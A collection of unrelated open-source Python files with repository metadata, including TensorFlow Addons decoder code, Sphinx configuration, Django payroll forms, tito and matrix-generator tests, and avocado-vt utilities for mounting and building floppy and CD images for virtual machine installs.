if static_batch_size is None:
return tf.concat(([batch_size], shape), axis=0)
return [static_batch_size] + shape
def _transpose_batch_time(tensor):
"""Transposes the batch and time dimension of tensor if its rank is at
least 2."""
shape = tensor.shape
if shape.rank is not None and shape.rank < 2:
return tensor
perm = tf.concat(([1, 0], tf.range(2, tf.rank(tensor))), axis=0)
return tf.transpose(tensor, perm)
|
tensorflow/addons
|
tensorflow_addons/seq2seq/decoder.py
|
Python
|
apache-2.0
| 23,035 | 0.000781 |
# author : Etienne THIERY
from matgen import *
import random
import numpy
def test_symmetricPositiveDefinite():
for i in range(10):
print(".", end="", flush=True)
size = random.randint(400, 500)
maxVal = random.randint(0, 1000)
M = symmetricPositiveDefinite(size, maxVal)
if not (isSymmetric(M) and isDefinitePositive(M)):
return False
return True
def test_symmetricSparsePositiveDefinite():
for i in range(10):
print(".", end="", flush=True)
size = random.randint(400, 500)
maxVal = random.randint(0, 1000)
nbZeros = random.randint(0, size*(size-1))
M = symmetricSparsePositiveDefinite(size, nbZeros, maxVal)
if not (isSymmetric(M) and isDefinitePositive(M) and abs(numberOfZeros(M)-nbZeros) <= 1):
return False
return True
def numberOfZeros(M):
count = 0
for line in M:
for coeff in line:
if coeff == 0:
count+=1
return count
def printTest(test_func):
print("Testing " + test_func.__name__[5:] + " : ", end="", flush=True)
print(("" if test_func() else "un") + "expected behaviour", flush=True)
printTest(test_symmetricPositiveDefinite)
printTest(test_symmetricSparsePositiveDefinite)
|
ethiery/heat-solver
|
trunk/test_matgen.py
|
Python
|
mit
| 1,289 | 0.006206 |
# -*- coding: utf-8 -*-
#
# HelixMC documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 21 15:51:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
#import sys
#import os
import time
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
#sys.path.insert(0, os.path.abspath('sphinxext'))
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'sphinx.ext.mathjax', 'numpydoc'
]
#Autodoc Stuffs
autosummary_generate = True
numpydoc_show_class_members = False
def skip(app, what, name, obj, skip, options):
if name == "__init__" or name == '__call__':
return False
return skip
def setup(app):
app.connect("autodoc-skip-member", skip)
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'HelixMC'
copyright = u'2013-%s, Fang-Chieh Chou (GPLv3 Licence)' % time.strftime('%Y')
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import helixmc
version = helixmc.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_trees = ['_templates']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
#pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/icon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'HelixMCdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [(
'index', 'HelixMC.tex', u'HelixMC Documentation',
u'Fang-Chieh Chou', 'manual'
)]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = '_static/logo.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output -------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'helixmc', u'HelixMC Documentation',
[u'Fang-Chieh Chou'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [(
'index', 'HelixMC', u'HelixMC Documentation',
u'Fang-Chieh Chou', 'HelixMC', 'One line description of project.',
'Miscellaneous'
)]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
trim_doctests_flags = True
|
fcchou/HelixMC
|
doc/source/conf.py
|
Python
|
gpl-3.0
| 8,069 | 0.005453 |
from syzoj.models import JudgeState
from syzoj import db
db.create_all()
all_judge = JudgeState.query.all()
for item in all_judge:
item.update_userac_info()
|
cdcq/jzyzj
|
syzoj/update_assistant/misc.py
|
Python
|
mit
| 163 | 0 |
import subprocess as Subprocess
import pymel.all as pm
class CapsDisabler(object):
def __init__(self, parentRef, go=False):
self.parentRef = parentRef
self.ini = self.parentRef.ini
self.conf = self.ini.conf
self.enabled = False
self.autohotkeyProcess = None
if go==True:
self.go()
def go(self):
try:
if int( self.ini.getItem("disable_capslock") ) == 1:
self.enabled = True
else:
#print("Hotkeys not enabled.")
pass
except:
print("\n Could not start CapsLock disabling system or could "
"not find info on it's configuration, perhaps because of "
"missing info in the ini file. \n")
if self.enabled:
self.disableCapslock()
def killAutohotkeyProcess(self):
if isinstance( self.autohotkeyProcess, Subprocess.Popen ):
try:
self.autohotkeyProcess.kill()
except:
u.log( "Autohotkey process not stopped. Perhaps it had "
"not been started.")
self.autohotkeyProcess = None
else:
self.autohotkeyProcess = None
def disableCapslock(self):
self.killAutohotkeyProcess()
self.autohotkeyProcess = None
self.autohotkeyProcess = Subprocess.Popen( self.parentRef.env.conf.autohotkey_command )
def startDisablingCapslock(self):
self.disableCapslock()
def stopDisablingCapslock(self):
self.killAutohotkeyProcess()
def setDisableCaplockOn(self):
print( "pretending to set disable_capslock to ON" )
#self.ini.setItem( disable_capslock, 1 ) ##untested code
pass
def setDisableCapslockOff(self):
print( "pretending to set disable_capslock to OFF" )
#self.ini.setItem( disable_capslock, 0 )
pass
|
joetainment/mmmmtools
|
MmmmToolsMod/Dynamic/CapsDisabler.py
|
Python
|
gpl-3.0
| 2,060 | 0.019417 |
from yowsup.structs import ProtocolEntity, ProtocolTreeNode
class IqProtocolEntity(ProtocolEntity):
'''
<iq type="{{get | set}}" id="{{id}}" xmlns="{{xmlns}}" to="{{TO}}" from="{{FROM}}">
</iq>
'''
TYPE_SET = "set"
TYPE_GET = "get"
TYPE_ERROR = "error"
TYPE_RESULT = "result"
TYPE_DELETE = "delete"
TYPES = (TYPE_SET, TYPE_GET, TYPE_RESULT, TYPE_ERROR, TYPE_DELETE)
def __init__(self, xmlns = None, _id = None, _type = None, to = None, _from = None):
super(IqProtocolEntity, self).__init__("iq")
assert _type in self.__class__.TYPES, "Iq of type %s is not implemented, can accept only (%s)" % (_type," | ".join(self.__class__.TYPES))
assert not to or not _from, "Can't set from and to at the same time"
self._id = self._generateId(True) if _id is None else _id
self._from = _from
self._type = _type
self.xmlns = xmlns
self.to = to
def getId(self):
return self._id
def getType(self):
return self._type
def getXmlns(self):
return self.xmlns
def getFrom(self, full = True):
return self._from if full else self._from.split('@')[0]
def getTo(self):
return self.to
def toProtocolTreeNode(self):
attribs = {
"id" : self._id,
"type" : self._type
}
if self.xmlns:
attribs["xmlns"] = self.xmlns
if self.to:
attribs["to"] = self.to
elif self._from:
attribs["from"] = self._from
return self._createProtocolTreeNode(attribs, None, data = None)
def __str__(self):
out = "Iq:\n"
out += "ID: %s\n" % self._id
out += "Type: %s\n" % self._type
if self.xmlns:
out += "xmlns: %s\n" % self.xmlns
if self.to:
out += "to: %s\n" % self.to
elif self._from:
out += "from: %s\n" % self._from
return out
@staticmethod
def fromProtocolTreeNode(node):
return IqProtocolEntity(
node.getAttributeValue("xmlns"),
node.getAttributeValue("id"),
node.getAttributeValue("type"),
node.getAttributeValue("to"),
node.getAttributeValue("from")
)
|
AragurDEV/yowsup
|
yowsup/layers/protocol_iq/protocolentities/iq.py
|
Python
|
gpl-3.0
| 2,304 | 0.010417 |
import unittest
from tito.buildparser import BuildTargetParser
from ConfigParser import ConfigParser
from tito.exception import TitoException
class BuildTargetParserTests(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.valid_branches = ["branch1", "branch2"]
self.release_target = "project-x.y.z"
self.releasers_config = ConfigParser()
self.releasers_config.add_section(self.release_target)
self.releasers_config.set(self.release_target, "build_targets",
"branch1:project-x.y.z-candidate")
def test_parser_gets_correct_targets(self):
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
release_targets = parser.get_build_targets()
self.assertTrue("branch1" in release_targets)
self.assertEqual("project-x.y.z-candidate", release_targets["branch1"])
self.assertFalse("branch2" in release_targets)
def test_invalid_branch_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
"invalid-branch:project-x.y.z-candidate")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_missing_semicolon_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
"invalid-branchproject-x.y.z-candidate")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_empty_branch_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
":project-x.y.z-candidate")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_empty_target_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
"branch1:")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_multiple_spaces_ok(self):
self.releasers_config.set(self.release_target, "build_targets",
" branch1:project-x.y.z-candidate ")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
release_targets = parser.get_build_targets()
self.assertEqual(1, len(release_targets))
self.assertTrue("branch1" in release_targets)
self.assertEqual("project-x.y.z-candidate", release_targets["branch1"])
def test_multiple_branches_supported(self):
self.releasers_config.set(self.release_target, "build_targets",
"branch1:project-x.y.z-candidate branch2:second-target")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
release_targets = parser.get_build_targets()
self.assertEquals(2, len(release_targets))
self.assertTrue("branch1" in release_targets)
self.assertEqual("project-x.y.z-candidate", release_targets["branch1"])
self.assertTrue("branch2" in release_targets)
self.assertEqual("second-target", release_targets['branch2'])
|
domcleal/tito
|
test/unit/test_build_target_parser.py
|
Python
|
gpl-2.0
| 3,872 | 0.000517 |
from django.forms.formsets import BaseFormSet, formset_factory
from django.forms.models import BaseModelFormSet
from django.forms.models import modelformset_factory
from django import forms
from models import PlanillaHistoricas, ConceptosFolios, Folios, Tomos
class PlanillaHistoricasForm(forms.Form):
codi_empl_per = forms.CharField(max_length=50, widget=forms.TextInput(attrs={'class': 'nombre', 'placeholder': 'Apellidos y Nombres'}))
desc_plan_stp = forms.CharField(max_length=200, widget=forms.Textarea(attrs={'rows': 1}))
def __init__(self, concepto, *args, **kwargs):
super(PlanillaHistoricasForm, self).__init__(*args, **kwargs)
campos = dict()
egr = 'border-color: #e9322d; -webkit-box-shadow: 0 0 6px #f8b9b7; -moz-box-shadow: 0 0 6px #f8b9b7; box-shadow: 0 0 6px #f8b9b7;';
ing = 'border-color: #2D78E9; -webkit-box-shadow: 0 0 6px #2D78E9; -moz-box-shadow: 0 0 6px #2D78E9; box-shadow: 0 0 6px #2D78E9;';
total = 'border-color: rgb(70, 136, 71); -webkit-box-shadow: 0 0 6px rgb(70, 136, 71); -moz-box-shadow: 0 0 6px rgb(70, 136, 71); box-shadow: 0 0 6px rgb(70, 136, 71);';
for conc in concepto:
codigo = conc.codi_conc_tco.codi_conc_tco
descripcion = conc.codi_conc_tco.desc_cort_tco
tipo = conc.codi_conc_tco.tipo_conc_tco
clase = 'remuneraciones' if codigo == 'C373' else 'descuentos' if codigo == 'C374' else 'total' if codigo == 'C12' else 'monto'
attrs = {
'class': clase + ' error',
'data-title': descripcion,
'data-tipo': tipo,
'style': 'width:auto;font-size:15px;' + (ing if tipo == '1' else egr if tipo == '2' else total if codigo in ('C373', 'C12', 'C374') else ''),
'maxlength': 35,
'placeholder': descripcion
}
if codigo in campos:
campos[codigo] += 1
else:
campos[codigo] = 1
index = campos[codigo]
flag = '_%s' % index
self.fields['%s%s' % (codigo, flag)] = forms.CharField(widget=forms.TextInput(attrs=attrs))
self.fields['codigos'] = forms.CharField(max_length=700, widget=forms.HiddenInput())
class BasePlanillaHistoricasFormSet(BaseFormSet):
def __init__(self, *args, **kwargs):
self.concepto = kwargs['concepto']
del kwargs['concepto']
super(BasePlanillaHistoricasFormSet, self).__init__(*args, **kwargs)
def _construct_form(self, i, **kwargs):
kwargs['concepto'] = self.concepto
return super(BasePlanillaHistoricasFormSet, self)._construct_form(i, **kwargs)
def add_fields(self, form, index):
super(BasePlanillaHistoricasFormSet, self).add_fields(form, index)
PlanillaHistoricasFormSet = formset_factory(#form=PlanillaHistoricasForm,
form=PlanillaHistoricasForm,
formset=BasePlanillaHistoricasFormSet,
extra=0, can_delete=False) #exclude=('id', ))
|
heraldmatias/django-payroll
|
src/inei/planilla/forms.py
|
Python
|
gpl-3.0
| 3,110 | 0.006431 |
"""
Virtualization test - Virtual disk related utility functions
:copyright: Red Hat Inc.
"""
import os
import glob
import shutil
import stat
import tempfile
import logging
import re
try:
import configparser as ConfigParser
except ImportError:
import ConfigParser
from avocado.core import exceptions
from avocado.utils import process
from avocado.utils.service import SpecificServiceManager
from virttest import error_context
from virttest.compat_52lts import decode_to_text
# Whether to print all shell commands called
DEBUG = False
def copytree(src, dst, overwrite=True, ignore=''):
"""
Copy dirs from source to target.
:param src: source directory
:param dst: destination directory
:param overwrite: overwrite file if exist or not
:param ignore: files want to ignore
"""
ignore = glob.glob(os.path.join(src, ignore))
for root, dirs, files in os.walk(src):
dst_dir = root.replace(src, dst)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
for _ in files:
if _ in ignore:
continue
src_file = os.path.join(root, _)
dst_file = os.path.join(dst_dir, _)
if os.path.exists(dst_file):
if overwrite:
os.remove(dst_file)
else:
continue
shutil.copy(src_file, dst_dir)
def is_mount(src, dst=None, fstype=None, options=None, verbose=False,
session=None):
"""
Check is src or dst mounted.
:param src: source device or directory
:param dst: mountpoint, if None will skip to check
:param fstype: file system type, if None will skip to check
:param options: mount options should be seperated by ","
:param session: check within the session if given
:return: True if mounted, else return False
"""
mount_str = "%s %s %s" % (src, dst, fstype)
mount_str = mount_str.replace('None', '').strip()
mount_list_cmd = 'cat /proc/mounts'
if session:
mount_result = session.cmd_output_safe(mount_list_cmd)
else:
mount_result = decode_to_text(process.system_output(mount_list_cmd, shell=True))
if verbose:
logging.debug("/proc/mounts contents:\n%s", mount_result)
for result in mount_result.splitlines():
if mount_str in result:
if options:
options = options.split(",")
options_result = result.split()[3].split(",")
for op in options:
if op not in options_result:
if verbose:
logging.info("%s is not mounted with given"
" option %s", src, op)
return False
if verbose:
logging.info("%s is mounted", src)
return True
if verbose:
logging.info("%s is not mounted", src)
return False
def mount(src, dst, fstype=None, options=None, verbose=False, session=None):
"""
Mount src under dst if it's really mounted, then remout with options.
:param src: source device or directory
:param dst: mountpoint
:param fstype: filesystem type need to mount
:param options: mount options
:param session: mount within the session if given
:return: if mounted return True else return False
"""
options = (options and [options] or [''])[0]
if is_mount(src, dst, fstype, options, verbose, session):
if 'remount' not in options:
options = 'remount,%s' % options
cmd = ['mount']
if fstype:
cmd.extend(['-t', fstype])
if options:
cmd.extend(['-o', options])
cmd.extend([src, dst])
cmd = ' '.join(cmd)
if session:
return session.cmd_status(cmd, safe=True) == 0
return process.system(cmd, verbose=verbose) == 0
def umount(src, dst, fstype=None, verbose=False, session=None):
"""
Umount src from dst, if src really mounted under dst.
:param src: source device or directory
:param dst: mountpoint
:param fstype: fstype used to check if mounted as expected
:param session: umount within the session if given
:return: if unmounted return True else return False
"""
mounted = is_mount(src, dst, fstype, verbose=verbose, session=session)
if mounted:
from . import utils_package
package = "psmisc"
# check package is available, if not try installing it
if not utils_package.package_install(package):
logging.error("%s is not available/installed for fuser", package)
fuser_cmd = "fuser -km %s" % dst
umount_cmd = "umount %s" % dst
if session:
session.cmd_output_safe(fuser_cmd)
return session.cmd_status(umount_cmd, safe=True) == 0
process.system(fuser_cmd, ignore_status=True, verbose=True, shell=True)
return process.system(umount_cmd, ignore_status=True, verbose=True) == 0
return True
@error_context.context_aware
def cleanup(folder):
"""
If folder is a mountpoint, do what is possible to unmount it. Afterwards,
try to remove it.
:param folder: Directory to be cleaned up.
"""
error_context.context(
"cleaning up unattended install directory %s" % folder)
umount(None, folder)
if os.path.isdir(folder):
shutil.rmtree(folder)
@error_context.context_aware
def clean_old_image(image):
"""
Clean a leftover image file from previous processes. If it contains a
mounted file system, do the proper cleanup procedures.
:param image: Path to image to be cleaned up.
"""
error_context.context("cleaning up old leftover image %s" % image)
if os.path.exists(image):
umount(image, None)
os.remove(image)
class Disk(object):
"""
Abstract class for Disk objects, with the common methods implemented.
"""
def __init__(self):
self.path = None
def get_answer_file_path(self, filename):
return os.path.join(self.mount, filename)
def copy_to(self, src):
logging.debug("Copying %s to disk image mount", src)
dst = os.path.join(self.mount, os.path.basename(src))
if os.path.isdir(src):
shutil.copytree(src, dst)
elif os.path.isfile(src):
shutil.copyfile(src, dst)
def close(self):
os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
cleanup(self.mount)
logging.debug("Disk %s successfully set", self.path)
class FloppyDisk(Disk):
"""
Represents a floppy disk. We can copy files to it, and setup it in
convenient ways.
"""
@error_context.context_aware
def __init__(self, path, qemu_img_binary, tmpdir, vfd_size):
error_context.context(
"Creating unattended install floppy image %s" % path)
self.mount = tempfile.mkdtemp(prefix='floppy_virttest_', dir=tmpdir)
self.path = path
self.vfd_size = vfd_size
clean_old_image(path)
try:
c_cmd = '%s create -f raw %s %s' % (qemu_img_binary, path,
self.vfd_size)
process.run(c_cmd, verbose=DEBUG)
f_cmd = 'mkfs.msdos -s 1 %s' % path
process.run(f_cmd, verbose=DEBUG)
except process.CmdError as e:
logging.error("Error during floppy initialization: %s" % e)
cleanup(self.mount)
raise
def close(self):
"""
Copy everything that is in the mountpoint to the floppy.
"""
pwd = os.getcwd()
try:
os.chdir(self.mount)
path_list = glob.glob('*')
for path in path_list:
self.copy_to(path)
finally:
os.chdir(pwd)
cleanup(self.mount)
def copy_to(self, src):
logging.debug("Copying %s to floppy image", src)
mcopy_cmd = "mcopy -s -o -n -i %s %s ::/" % (self.path, src)
process.run(mcopy_cmd, verbose=DEBUG)
def _copy_virtio_drivers(self, virtio_floppy):
"""
Copy the virtio drivers on the virtio floppy to the install floppy.
1) Mount the floppy containing the viostor drivers
2) Copy its contents to the root of the install floppy
"""
pwd = os.getcwd()
try:
m_cmd = 'mcopy -s -o -n -i %s ::/* %s' % (
virtio_floppy, self.mount)
process.run(m_cmd, verbose=DEBUG)
finally:
os.chdir(pwd)
def setup_virtio_win2003(self, virtio_floppy, virtio_oemsetup_id):
"""
Setup the install floppy with the virtio storage drivers, win2003 style.
Win2003 and WinXP depend on the file txtsetup.oem file to install
the virtio drivers from the floppy, which is a .ini file.
Process:
1) Copy the virtio drivers on the virtio floppy to the install floppy
2) Parse the ini file with config parser
3) Modify the identifier of the default session that is going to be
executed on the config parser object
4) Re-write the config file to the disk
"""
self._copy_virtio_drivers(virtio_floppy)
txtsetup_oem = os.path.join(self.mount, 'txtsetup.oem')
if not os.path.isfile(txtsetup_oem):
raise IOError('File txtsetup.oem not found on the install '
'floppy. Please verify if your floppy virtio '
'driver image has this file')
parser = ConfigParser.ConfigParser()
parser.read(txtsetup_oem)
if not parser.has_section('Defaults'):
raise ValueError('File txtsetup.oem does not have the session '
'"Defaults". Please check txtsetup.oem')
default_driver = parser.get('Defaults', 'SCSI')
if default_driver != virtio_oemsetup_id:
parser.set('Defaults', 'SCSI', virtio_oemsetup_id)
fp = open(txtsetup_oem, 'w')
parser.write(fp)
fp.close()
def setup_virtio_win2008(self, virtio_floppy):
"""
Setup the install floppy with the virtio storage drivers, win2008 style.
Win2008, Vista and 7 require people to point out the path to the drivers
on the unattended file, so we just need to copy the drivers to the
driver floppy disk. Important to note that it's possible to specify
drivers from a CDROM, so the floppy driver copy is optional.
Process:
1) Copy the virtio drivers on the virtio floppy to the install floppy,
if there is one available
"""
if os.path.isfile(virtio_floppy):
self._copy_virtio_drivers(virtio_floppy)
else:
logging.debug(
"No virtio floppy present, not needed for this OS anyway")
class CdromDisk(Disk):
"""
Represents a CDROM disk that we can master according to our needs.
"""
def __init__(self, path, tmpdir):
self.mount = tempfile.mkdtemp(prefix='cdrom_virttest_', dir=tmpdir)
self.tmpdir = tmpdir
self.path = path
clean_old_image(path)
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
def _copy_virtio_drivers(self, virtio_floppy, cdrom_virtio):
"""
Copy the virtio drivers from floppy and cdrom to install cdrom.
1) Mount the floppy and cdrom containing the virtio drivers
2) Copy its contents to the root of the install cdrom
"""
pwd = os.getcwd()
mnt_pnt = tempfile.mkdtemp(prefix='cdrom_virtio_', dir=self.tmpdir)
mount(cdrom_virtio, mnt_pnt, options='loop,ro', verbose=DEBUG)
try:
copytree(mnt_pnt, self.mount, ignore='*.vfd')
cmd = 'mcopy -s -o -n -i %s ::/* %s' % (virtio_floppy, self.mount)
process.run(cmd, verbose=DEBUG)
finally:
os.chdir(pwd)
umount(None, mnt_pnt, verbose=DEBUG)
os.rmdir(mnt_pnt)
def setup_virtio_win2008(self, virtio_floppy, cdrom_virtio):
"""
Setup the install cdrom with the virtio storage drivers, win2008 style.
Win2008, Vista and 7 require people to point out the path to the drivers
on the unattended file, so we just need to copy the drivers to the
extra cdrom disk. Important to note that it's possible to specify
drivers from a CDROM, so the floppy driver copy is optional.
Process:
1) Copy the virtio drivers on the virtio floppy to the install cdrom,
if there is one available
"""
if os.path.isfile(virtio_floppy):
self._copy_virtio_drivers(virtio_floppy, cdrom_virtio)
else:
logging.debug(
"No virtio floppy present, not needed for this OS anyway")
@error_context.context_aware
def close(self):
error_context.context(
"Creating unattended install CD image %s" % self.path)
g_cmd = ('mkisofs -o %s -max-iso9660-filenames '
'-relaxed-filenames -D --input-charset iso8859-1 '
'%s' % (self.path, self.mount))
process.run(g_cmd, verbose=DEBUG)
os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
cleanup(self.mount)
logging.debug("unattended install CD image %s successfully created",
self.path)
class CdromInstallDisk(Disk):
"""
Represents a install CDROM disk that we can master according to our needs.
"""
def __init__(self, path, tmpdir, source_cdrom, extra_params):
self.mount = tempfile.mkdtemp(prefix='cdrom_unattended_', dir=tmpdir)
self.path = path
self.extra_params = extra_params
self.source_cdrom = source_cdrom
cleanup(path)
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
cp_cmd = ('cp -r %s/isolinux/ %s/' % (source_cdrom, self.mount))
listdir = os.listdir(self.source_cdrom)
for i in listdir:
if i == 'isolinux':
continue
os.symlink(os.path.join(self.source_cdrom, i),
os.path.join(self.mount, i))
process.run(cp_cmd)
def get_answer_file_path(self, filename):
return os.path.join(self.mount, 'isolinux', filename)
@error_context.context_aware
def close(self):
error_context.context(
"Creating unattended install CD image %s" % self.path)
if os.path.exists(os.path.join(self.mount, 'isolinux')):
# bootable cdrom
f = open(os.path.join(self.mount, 'isolinux', 'isolinux.cfg'), 'w')
f.write('default /isolinux/vmlinuz append initrd=/isolinux/'
'initrd.img %s\n' % self.extra_params)
f.close()
boot = '-b isolinux/isolinux.bin'
else:
# Not a bootable CDROM, using -kernel instead (eg.: arm64)
boot = ''
m_cmd = ('mkisofs -o %s %s -c isolinux/boot.cat -no-emul-boot '
'-boot-load-size 4 -boot-info-table -f -R -J -V -T %s'
% (self.path, boot, self.mount))
process.run(m_cmd)
os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
cleanup(self.mount)
cleanup(self.source_cdrom)
logging.debug("unattended install CD image %s successfully created",
self.path)
class GuestFSModiDisk(object):
"""
class of guest disk using guestfs lib to do some operation(like read/write)
on guest disk:
"""
def __init__(self, disk, backend='direct'):
"""
:params disk: target disk image.
:params backend: let libguestfs creates/connects to backend daemon
by starting qemu directly, or using libvirt to manage
an appliance, running User-Mode Linux, or connecting
to an already running daemon.
'direct', 'appliance', 'libvirt', 'libvirt:null',
'libvirt:URI', 'uml', 'unix:path'.
"""
try:
import guestfs
except ImportError:
install_cmd = "yum -y install python-libguestfs"
try:
process.run(install_cmd)
import guestfs
except Exception:
raise exceptions.TestSkipError('We need python-libguestfs (or '
'the equivalent for your '
'distro) for this particular '
'feature (modifying guest '
'files with libguestfs)')
self.g = guestfs.GuestFS()
self.disk = disk
self.g.add_drive(disk)
self.g.set_backend(backend)
libvirtd = SpecificServiceManager("libvirtd")
libvirtd_status = libvirtd.status()
if libvirtd_status is None:
raise exceptions.TestError('libvirtd: service not found')
if (not libvirtd_status) and (not libvirtd.start()):
raise exceptions.TestError('libvirtd: failed to start')
logging.debug("Launch the disk %s, wait..." % self.disk)
self.g.launch()
def os_inspects(self):
self.roots = self.g.inspect_os()
if self.roots:
return self.roots
else:
return None
def mounts(self):
return self.g.mounts()
def mount_all(self):
def compare(a, b):
if len(a[0]) > len(b[0]):
return 1
elif len(a[0]) == len(b[0]):
return 0
else:
return -1
roots = self.os_inspects()
if roots:
for root in roots:
mps = self.g.inspect_get_mountpoints(root)
mps.sort(compare)
for mp_dev in mps:
try:
msg = "Mount dev '%s' partitions '%s' to '%s'"
logging.info(msg % (root, mp_dev[1], mp_dev[0]))
self.g.mount(mp_dev[1], mp_dev[0])
except RuntimeError as err_msg:
logging.info("%s (ignored)" % err_msg)
else:
raise exceptions.TestError(
"inspect_vm: no operating systems found")
def umount_all(self):
logging.debug("Umount all device partitions")
if self.mounts():
self.g.umount_all()
def read_file(self, file_name):
"""
read file from the guest disk, return the content of the file
:param file_name: the file you want to read.
"""
try:
self.mount_all()
o = self.g.cat(file_name)
if o:
return o
else:
err_msg = "Can't read file '%s', check is it exist?"
raise exceptions.TestError(err_msg % file_name)
finally:
self.umount_all()
def write_to_image_file(self, file_name, content, w_append=False):
"""
Write content to the file on the guest disk.
When using this method all the original content will be overriding.
if you don't hope your original data be override set ``w_append=True``.
:param file_name: the file you want to write
:param content: the content you want to write.
:param w_append: append the content or override
"""
